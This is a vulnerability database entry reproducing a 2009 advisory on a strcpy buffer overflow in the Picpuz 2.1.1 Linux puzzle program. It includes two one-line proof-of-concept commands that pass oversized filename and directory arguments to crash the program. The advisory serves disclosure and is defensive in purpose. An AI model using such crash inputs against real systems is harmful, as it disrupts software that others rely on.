Lucene search
K

Picpuz <=2.1.1 Buffer Overflow DoS/PoC

🗓️ 24 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Picpuz Buffer Overflow DoS/PoC <=2.1.1, Free Linux "jigsaw puzzle" program, input filename/directory length not checked, buffer overwritten by strcp

Code

                                                # Exploit Title: Picpuz Buffer Overflow DoS/PoC &lt;=2.1.1
# Date: 24 Dec, 2009
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Software Link: http://kornelix.squarespace.com/picpuz/&lt;http://kornelix.squarespace.com/printoxx/&gt;, http://kornelix.squarespace.com/storage/downloads/picpuz-2.1.1.tar.gz&lt;http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz&gt;

# Version: &lt;= 2.1.1
# Tested on: Fedora 12
# CVE: None
# Code:

Description:
&quot;from website&quot;
Picpuz is a free Linux &quot;jigsaw puzzle&quot; program.

You can take almost any image (jpeg, tiff, png ...) and scramble it into many pieces (tens to hundreds). You can

then reassemble the picture using the mouse to move the pieces around.


Vulnerability:
Picpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy.


Proof Of Concept:
Image filename overflow:
$ ./picpuz -f $(python -c 'print &quot;A&quot;*1500')

Directory filename overflow:
$ ./picpuz -i $(python -c 'print &quot;A&quot;*1500')


Severity: Very Low

#$


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation